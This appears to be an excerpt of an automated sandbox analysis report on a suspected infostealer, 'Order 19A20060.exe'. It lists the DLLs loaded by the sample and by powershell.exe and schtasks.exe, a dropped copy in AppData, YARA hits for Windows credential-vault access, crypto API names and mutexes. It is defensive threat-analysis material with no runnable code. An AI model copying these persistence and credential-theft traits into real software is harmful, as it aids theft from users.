                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1676980877.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1683229864.0000000007F80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1678263931.000000000320C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000008.00000002.4094648140.0000000000F39000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Order 19A20060.exe
                        Source: Order 19A20060.exe | Binary or memory string: OriginalFilenameTBIu.exe< vs Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rasman.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: secur32.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: edputil.dll
                        Source: Order 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: Order 19A20060.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SgJzugoOJvLgL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, UyDMxsd3t.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, 86A7K.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, vztq.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, B80ITW1.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, uQSn7t.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, bEoUgRL.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, LaZPtv2pWN66FdMorM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, LaZPtv2pWN66FdMorM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@2/2
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMutant created: \Sessions\1\BaseNamedObjects\xHFdADdvLwuntDPGiwacgvoUIb
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
